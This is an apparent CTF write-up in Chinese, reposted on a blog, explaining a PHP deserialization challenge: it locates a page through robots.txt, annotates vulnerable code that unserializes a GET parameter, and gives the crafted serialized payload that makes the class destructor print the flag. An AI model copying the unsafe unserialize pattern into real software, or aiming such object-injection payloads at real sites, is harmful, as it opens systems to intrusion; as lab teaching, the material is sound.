題目在哪呢?查看源代碼試試
User-agent: *
Disallow: 什么東西呢
發現disallow
Robots 協議(也稱為爬蟲協議、機器人協議等)的全稱是 “網路爬蟲排除標準”(Robots Exclusion Protocol),網站通過 Robots 協議告訴搜索引擎哪些頁面可抓,哪些頁面不能抓,
disallow就是爬蟲不能搜索的所以我們去看看robots.txt
看到/cl45s.php,直接打開
接下來就是 php代碼審計
<?php
error_reporting(0); #通過error_reporting屏蔽報錯
show_source("cl45s.php"); #將c145s.php的代碼顯示到頁面上
class wllm{ #定義了一個wllm類
public $admin; #公共變數admin
public $passwd; #公共變數passwd
public function __construct(){ #construct當類創建時呼叫
$this->admin ="user"; #指定admin的值為user
$this->passwd = "123456"; #指定passwd的值為123456
}
public function __destruct(){ #destruct當物件要銷毀時呼叫
if($this->admin === "admin" && $this->passwd === "ctf"){ #if判斷 admin的值是不是admin passwd的值是不是ctf
include("flag.php"); #include包含flag 當if判斷成立時執行
echo $flag; #輸出flag
}else{
echo $this->admin;
echo $this->passwd;
echo "Just a bit more!";
}
}
}
$p = $_GET['p']; #get方法獲取p并賦值
unserialize($p); #對p進行反序列化
?>
簡單構造一下(當然了 也可以手搓)
<?php
class wllm{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="admin";
$this->passwd = "ctf";
}
}
$p = new wllm();
echo serialize($p);
p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
解釋一下:
O:4:"wllm":2:
O就是object物件的意思,4代表著物件的函式名為4個位元組
2表示物件中有倆個變數(不同魔法函式,結果不同)
{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
大括號里s代表string型別還有i是int型;
前者為變數 后者為變數的值
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/552643.html
標籤:其他
上一篇:UE5 材質 雨滴shader
下一篇:返回列表